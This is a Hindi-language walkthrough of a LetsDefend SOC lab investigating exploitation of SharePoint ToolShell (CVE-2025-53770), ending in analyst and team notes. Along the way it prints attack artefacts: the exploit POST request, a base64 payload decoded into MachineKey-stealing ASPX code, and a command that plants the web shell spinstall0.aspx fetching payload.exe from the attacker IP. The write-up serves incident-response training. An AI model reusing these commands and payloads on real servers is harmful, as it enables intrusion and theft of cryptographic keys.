
LetsDefend प्रयोगशाला में CVE-2025-53770 (ToolShell) के शोषण की चरण-दर-चरण वॉकथ्रू, जिसमें RCE, वेब शेल परिनियोजन, और घटना प्रतिक्रिया विश्लेषण शामिल है।
TL;DR अरे, इस LetsDefend लैब में मैंने ToolShell (CVE-2025-53770) नामक SharePoint जीरो-डे का गहराई से अध्ययन किया। मूलतः, मैंने एक वास्तविक-दुनिया के हमले का अनुकरण किया जहाँ एक दुर्भावनापूर्ण POST अनुरोध ने प्रमाणीकरण को बायपास किया, MachineKeySection कुंजियाँ चुराने के लिए PowerShell चलाया, payload.exe संकलित किया, और एक वेब शेल (spinstall0.aspx) गिरा दिया। मैंने सब कुछ लॉग किया, व्यवहार का विश्लेषण किया, और होस्ट को कंटेन किया। यह README हमले, मेरे कदमों और सीखे गए सबक को कवर करता है।
Lab Overview
Tools Used:
Windows PowerShell
VirusTotal
AbuseIPDB
LetsDefend Log Management
LetsDefend Enpoint Security
LetsDefend Threat Intel


EventID : 320
Event Time : Jul, 22, 2025, 01:07 PM
Rule : SOC342 - CVE‑2025‑53770 SharePoint ToolShell Auth Bypass and RCE
Level : Security Analyst
Hostname : SharePoint01
Source IP Address : 107.191.58.76
Destination IP Address : 172.16.20.17
HTTP Request Method : POST
Requested URL : /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Referer : /_layouts/SignOut.aspx
Content-Length : 7699
Alert Trigger Reason : Suspicious unauthenticated POST request targeting ToolPane.aspx with large payload size and spoofed referer indicative of CVE-2025-53770 exploitation.
Device Action : Allowed
Overview 22 जुलाई, 2025 को, हमारी सुरक्षा निगरानी ने SharePoint01 नामक ऑन-प्रिमाइसेस SharePoint सर्वर इंस्टेंस पर एक गंभीर जीरो-डे हमले को फ्लैग किया।
CVE Details:
CISA KEV Catalog: प्रविष्टि 20 जुलाई, 2025 को प्रकाशित
Attack Vector: POST request to /ToolPane.aspx endpoint, spoofed referer header, large malicious payload
Source: IP 107.191.58.76, Vultr Holdings, LLC, USA
About SharePoint Microsoft SharePoint एंटरप्राइज सहयोग और दस्तावेज़ प्रबंधन की रीढ़ है। यह अनिवार्य रूप से फ़ाइलों, वर्कफ़्लो और आंतरिक ऐप्स के लिए एक सुरक्षित, संगठित क्लाउड-जैसी जगह है।
Core Uses:
Document Management: संस्करण नियंत्रण, ऑडिट ट्रेल, फ़ाइल नियंत्रण
Collaboration: एकाधिक उपयोगकर्ता एक साथ एक ही दस्तावेज़ संपादित कर रहे हैं
Internal Web Portals: समाचार, अपडेट, HR जानकारी, नीतियाँ
Automated Workflows: अनुमोदन, फॉर्म, अधिसूचनाएं
Integration: Teams, Outlook, Office Suite, Power BI से गहराई से जुड़ा हुआ
Security Considerations:
Authentication: AD या SSO
Encryption: डेटा आराम और ट्रांज़िट में
Web Parts & Layouts: यदि गलत तरीके से कॉन्फ़िगर किया गया है तो इसका शोषण किया जा सकता है
Patch Management: जीरो-डे हमलों को रोकने के लिए महत्वपूर्ण
CVE-2025-53770, जिसे ToolShell भी कहा जाता है, एक SharePoint जीरो-डे है जिसका जंगली में शोषण किया गया है। यह ऑन-प्रिमाइसेस Microsoft SharePoint सर्वरों में एक गंभीर डिसीरियलाइज़ेशन भेद्यता है जो अप्रमाणित रिमोट कोड निष्पादन (RCE) की अनुमति देती है। यह अन्य SharePoint दोषों (CVE-2025-49704 और CVE-2025-49706) के साथ श्रृंखलित होता है ताकि सिस्टम से पूरी तरह समझौता किया जा सके। इसका CVSS स्कोर 9.8 है, जिसका अर्थ है कि यह गंभीर है।
वे spinstall0.aspx जैसे दुर्भावनापूर्ण वेब शेल को ToolPane.aspx एंडपॉइंट के माध्यम से अपलोड करते हैं, प्रमाणीकरण को बायपास करने के लिए स्पूफ किए गए रेफरर हेडर का उपयोग करते हैं।
वे पहुंच को बनाए रखने के लिए विश्वसनीय ViewState पेलोड उत्पन्न करने के लिए SharePoint कॉन्फ़िग से महत्वपूर्ण MachineKey मान निकालते हैं।
और बाद में रैनसमवेयर (जैसे, "Warlock" स्ट्रेन) तैनात करते हैं या क्रेडेंशियल्स निकालते हैं और बैकडोर सेट करते हैं।
पहला सार्वजनिक खुलासा: 19 जुलाई, 2025 (Microsoft ब्लॉग)
पैच जारी: 20–21 जुलाई, 2025
CISA के KEV कैटलॉग में प्रवेश: 20 जुलाई, 2025
प्रेषक के IP पते (Source IP Address) का VirusTotal पर विश्लेषण किया
Source IP Address : 107.191.58.76

इससे मुझे पता चल गया कि IP दुर्भावनापूर्ण है
अब मुझे AbuseIPDB की मदद से IP का स्थान खोजना है

मुझे यह मिला :
ISP Vultr Holdings, LLC
Usage Type - Data Center/Web Hosting/Transit
ASN - AS20473
Hostname(s) - 107.191.58.76.vultrusercontent.com
Domain Name - vultr.com
Country - संयुक्त राज्य अमेरिका
City - लॉस एंजिल्स, कैलिफोर्निया
IP हैकिंग, ब्रूट-फोर्स, वेब ऐप अटैक, पोर्ट स्कैन, DNS पॉइज़निंग के लिए जाना जाता है
एक जूनियर विश्लेषक के रूप में इसे हल करना मैंने यह कैसे किया पहले मैंने एंडपॉइंट सुरक्षा पर "SharePoint01" नाम से होस्ट की खोज की।

होस्ट का पता लगाने के बाद, मैं टर्मिनल हिस्ट्री में गया, मुझे एक कमांड लाइन मिली

कमांड में क्या हो रहा है?
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
→ सिस्टम डायरेक्टरी से सीधे PowerShell लॉन्च करता है।
-nop
→ कोई प्रोफ़ाइल नहीं — पहचान या हस्तक्षेप से बचने के लिए PowerShell प्रोफ़ाइल स्क्रिप्ट को अनदेखा करता है।
-w hidden
→ एक छिपी हुई विंडो के साथ चलता है ताकि उपयोगकर्ता इसे न देख सके।
-e
आइए इसे डिकोड करें
"PCVAIEltcG9ydCBOYW1lc3BhY2U9IlN5c3RlbS5EaWFnbm9zdGljcyIgJT4NCjwlQCBJbXBvcnQgTmFtZXNwYWNlPSJTeXN0ZW0uSU8iICU+DQo8c2NyaXB0IHJ1bmF0PSJzZXJ2ZXIiIGxhbmd1YWdlPSJjIyIgQ09ERVBBR0U9IjY1MDAxIj4NCiAgICBwdWJsaWMgdm9pZCBQYWdlX2xvYWQoKQ0KICAgIHsNCgkJdmFyIHN5ID0gU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkuTG9hZCgiU3lzdGVtLldlYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWIwM2Y1ZjdmMTFkNTBhM2EiKTsNCiAgICAgICAgdmFyIG1rdCA9IHN5LkdldFR5cGUoIlN5c3RlbS5XZWIuQ29uZmlndXJhdGlvbi5NYWNoaW5lS2V5U2VjdGlvbiIpOw0KICAgICAgICB2YXIgZ2FjID0gbWt0LkdldE1ldGhvZCgiR2V0QXBwbGljYXRpb25Db25maWciLCBTeXN0ZW0uUmVmbGVjdGlvbi5CaW5kaW5nRmxhZ3MuU3RhdGljIHwgU3lzdGVtLlJlZmxlY3Rpb24uQmluZGluZ0ZsYWdzLk5vblB1YmxpYyk7DQogICAgICAgIHZhciBjZyA9IChTeXN0ZW0uV2ViLkNvbmZpZ3VyYXRpb24uTWFjaGluZUtleVNlY3Rpb24pZ2FjLkludm9rZShudWxsLCBuZXcgb2JqZWN0WzBdKTsNCiAgICAgICAgUmVzcG9uc2UuV3JpdGUoY2cuVmFsaWRhdGlvbktleSsifCIrY2cuVmFsaWRhdGlvbisifCIrY2cuRGVjcnlwdGlvbktleSsifCIrY2cuRGVjcnlwdGlvbisifCIrY2cuQ29tcGF0aWJpbGl0eU1vZGUpOw0KICAgIH0NCjwvc2NyaXB0Pg=="
चरण 1: रिकॉन और पेलोड कैप्चर
/ToolPane.aspx पर POST अनुरोध कैप्चर किया:
POST /_layouts/15/ToolPane.aspx HTTP/1.1 Host: sharepoint01.lab Content-Type: application/x-www-form-urlencoded Content-Length: 1452 Referer: http://sharepoint01.lab/_layouts/15/settings.aspx User-Agent: Mozilla/5.0 Payload=BASE64_ENCODED_POWERSHELL_PAYLOAD_HERE
Method: POST request to /ToolPane.aspx bypassing authentication
Payload: बड़ी, अस्पष्ट, Base64-एन्कोडेड PowerShell स्क्रिप्ट
Referer Header: उत्पत्ति छिपाने के लिए स्पूफ किया गया
चरण 2: निष्पादन और शोषण:
मैंने Base64 डिकोडर में स्क्रिप्ट/पेलोड को डिकोड किया
base64 से डिकोड करने पर यह मिला
"<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script runat="server" language="c#" CODEPAGE="65001">
public void Page\_load()
{
var sy = System.Reflection.Assembly.Load("System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a");
var mkt = sy.GetType("System.Web.Configuration.MachineKeySection");
var gac = mkt.GetMethod("GetApplicationConfig", System.Reflection.BindingFlags.Static | System.Reflection.BindingFlags.NonPublic);
var cg = (System.Web.Configuration.MachineKeySection)gac.Invoke(null, new object\[0]);
Response.Write(cg.ValidationKey+"|"+cg.Validation+"|"+cg.DecryptionKey+"|"+cg.Decryption+"|"+cg.CompatibilityMode);
}

मुझे समझाने दें कि उपरोक्त स्क्रिप्ट क्या करती है
यह आयात करता है:
-System.Diagnostics
-System.IO
⦁ और फिर PowerShell के अंदर एक C# इनलाइन स्क्रिप्ट चलाता है जो:
-System.Web असेंबली लोड करता है
-System.Web.Configuration.MachineKeySection तक पहुँचता है
-मशीन के web.config से सत्यापन और डिक्रिप्शन कुंजियाँ पुनर्प्राप्त करता है
-फिर उन्हें प्रतिक्रिया में लिखता है, संभवतः उन्हें हमलावर को निकालने के लिए
हमलावर ने आगे यह कमांड भेजना जारी रखा
""C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /out:C:\Windows\Temp\payload.exe C:\Windows\Temp\payload.cs"
-csc.exe - .NET फ्रेमवर्क के साथ एक C# कंपाइलर
-फिर कंपाइलर को इस "payload.exe" को होस्ट पर सहेजने का निर्देश देता है
यह पेलोड मैलवेयर हो सकता है
हमलावर द्वारा अगली कमांड लाइन
""C:\Windows\System32\cmd.exe" /c echo <form runat=\"server\"> <object classid=\"clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11\"><param name=\"Command\" value=\"Redirect\"> <param name=\"Button\" value=\"Test\"> <param name=\"Url\" value=\"http://107.191.58.76/payload.exe\"></object></form> > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx"
यह क्या करता है
"C:\Windows\System32\cmd.exe" /c -
निम्नलिखित कमांड को कमांड प्रॉम्प्ट में चलाता है और फिर समाप्त करता है।
echo <form runat=\"server\"> ... </form>-
ASP.NET मार्कअप का एक छोटा सा टुकड़ा लिखता है जो SharePoint सर्वर पर चलेगा।
मार्कअप में शामिल है:
<object classid="clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11"> -
यह CLSID शेल ActiveX नियंत्रण है (IE/COM संदर्भ में शेल कमांड चलाने या विशेष क्रियाएं करने के लिए उपयोग किया जाता है)।
<param name="Command" value="Redirect"> -
यह ऑब्जेक्ट को बताता है कि क्या कार्रवाई करनी है।
<param name="Url" value="http://107.191.58.76/payload.exe"> -
एक दूरस्थ सर्वर पर होस्ट किए गए दुर्भावनापूर्ण EXE की ओर इशारा करता है — बहुत संभवतः उनका वास्तविक मैलवेयर।
हमलावर द्वारा अगली कमांड लाइन
""C:\Windows\System32\cmd.exe" /c echo <form runat=\"server\"> <object classid=\"clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11\"><param name=\"Command\" value=\"Redirect\"> <param name=\"Button\" value=\"Test\"> <param name=\"Url\" value=\"http://107.191.58.76/payload.exe\"></object></form> > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx"
फिर से यह क्या करता है:
"C:\Windows\System32\cmd.exe" /c -
निम्नलिखित कमांड को कमांड प्रॉम्प्ट में चलाता है और फिर समाप्त करता है।
echo <form runat=\"server\"> ... </form> -
ASP.NET मार्कअप का एक छोटा सा टुकड़ा लिखता है जो SharePoint सर्वर पर चलेगा।
और भी
मार्कअप में शामिल है:
<object classid="clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11">
यह CLSID शेल ActiveX नियंत्रण है (IE/COM संदर्भ में शेल कमांड चलाने या विशेष क्रियाएं करने के लिए उपयोग किया जाता है)।
<param name="Command" value="Redirect">-
यह ऑब्जेक्ट को बताता है कि क्या कार्रवाई करनी है।
<param name="Url" value="http://107.191.58.76/payload.exe"> -
एक दूरस्थ सर्वर पर होस्ट किए गए दुर्भावनापूर्ण EXE की ओर इशारा करता है — बहुत संभवतः उनका वास्तविक मैलवेयर।
> C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\16\\TEMPLATE\\LAYOUTS\\spinstall0.aspx -
उस संपूर्ण दुर्भावनापूर्ण HTML/ASP.NET ऑब्जेक्ट को SharePoint के layouts फ़ोल्डर के अंदर spinstall0.aspx के रूप में सहेजता है।
इस फ़ोल्डर में किसी भी चीज़ को SharePoint साइट पर सही URL ब्राउज़ करके एक्सेस किया जा सकता है, जिसका अर्थ है कि हमलावर के पास अब आपके सर्वर पर एक वेब पेज है जो दुर्भावनापूर्ण कार्रवाई को ट्रिगर करता है।
मुझे जो कमांड लाइन मिली, वे नीचे हैं:


यह पुष्टि करने के बाद कि यह जोखिम भरा है, मैं होस्ट पर प्रक्रियाओं का पता लगाने गया।
संदिग्ध लग रहा है, फ़ाइल पथों और exe से भरा हुआ
सिर्फ जिज्ञासा के लिए, मैं लॉग प्रबंधन में गया और लॉग में दुर्भावनापूर्ण IP खोजा।
एक पोस्ट अनुरोध के साथ एक कच्चा लॉग देखा
एक रेफ़रर के साथ - /_layouts/SignOut.aspx
मैं जाँचने गया कि क्या हमला सफल रहा।
आप जानते हैं क्या? यह सफल था, इसलिए अब मुझे इसे SOC2 के लिए कंटेन करना होगा
यह मेरा विश्लेषक नोट है:
हमने SharePoint01 नामक ऑन-प्रिमाइसेस SharePoint सर्वर में ToolShell (CVE-2025-53770) नामक जीरो-डे भेद्यता का शोषण करने वाले एक गंभीर हमले का पता लगाया। हमलावर ने एक ज्ञात दुर्भावनापूर्ण IP (107.191.58.76) से SharePoint एंडपॉइंट (ToolPane.aspx) पर एक बड़े पेलोड के साथ एक अप्रमाणित POST अनुरोध भेजा, प्रमाणीकरण को बायपास करके सर्वर पर रिमोट कोड चलाया।
गहराई से जांच करने पर, हमलावर ने छिपी हुई PowerShell कमांड चलाई जिसने संवेदनशील SharePoint MachineKey मान चुराने के लिए base64 स्क्रिप्ट को डिकोड किया, जिससे उन्हें विश्वसनीय पेलोड तैयार करने की अनुमति मिली। उन्होंने होस्ट पर एक दुर्भावनापूर्ण निष्पादन योग्य संकलित किया, फिर SharePoint के layouts फ़ोल्डर में एक वेब शेल (spinstall0.aspx) लगाया जो उनके सर्वर से मैलवेयर डाउनलोड और चलाता है, जिससे स्थायी बैकडोर पहुँच मिलती है।
समझौते की पुष्टि करने के बाद, हमने प्रभावित होस्ट को कंटेन किया और तत्काल पैचिंग की सिफारिश की क्योंकि कुछ दिन पहले ही फिक्स जारी किए गए थे। हम अन्य वेब शेल के लिए स्कैन भी कर रहे हैं, रैनसमवेयर या डेटा चोरी के लिए निगरानी कर रहे हैं, और आगे की क्षति को रोकने के लिए SharePoint सर्वर के आसपास कड़ी सुरक्षा की सलाह दे रहे हैं।
और टीम के लिए नोट:
टीम को नोट: अरे टीम, हमने अपने SharePoint सर्वर (SharePoint01) पर ToolShell जीरो-डे (CVE-2025-53770) के एक गंभीर शोषण का पता लगाया है। एक हमलावर ने प्रमाणीकरण को बायपास करने और रिमोट कोड निष्पादित करने के लिए एक अप्रमाणित POST अनुरोध का उपयोग किया, जो ToolPane.aspx को लक्षित करने वाले एक बड़े संदिग्ध पेलोड से शुरू हुआ।
हमलावर ने संवेदनशील SharePoint मशीन कुंजियाँ चुराने के लिए छिपी हुई PowerShell कमांड चलाई, फिर सिस्टम पर एक दुर्भावनापूर्ण निष्पादन योग्य संकलित और गिरा दिया। उन्होंने SharePoint layouts फ़ोल्डर में एक वेब शेल (spinstall0.aspx) भी बनाया, जो एक बाहरी सर्वर से मैलवेयर डाउनलोड और चलाता है, संभावित रूप से उन्हें स्थायी नियंत्रण देता है।
हमने समझौता किए गए होस्ट को कंटेन कर लिया है और तत्काल पैचिंग की सलाह देते हैं क्योंकि फिक्स अभी जारी किए गए हैं। हम समान वेब शेल के लिए भी स्कैन कर रहे हैं और रैनसमवेयर या डेटा एक्सफिल्ट्रेशन के संकेतों पर नज़र रख रहे हैं। आइए सतर्क रहें और आगे बढ़ते हुए SharePoint सुरक्षा को मजबूत करें।
यह मेरा परिणाम है
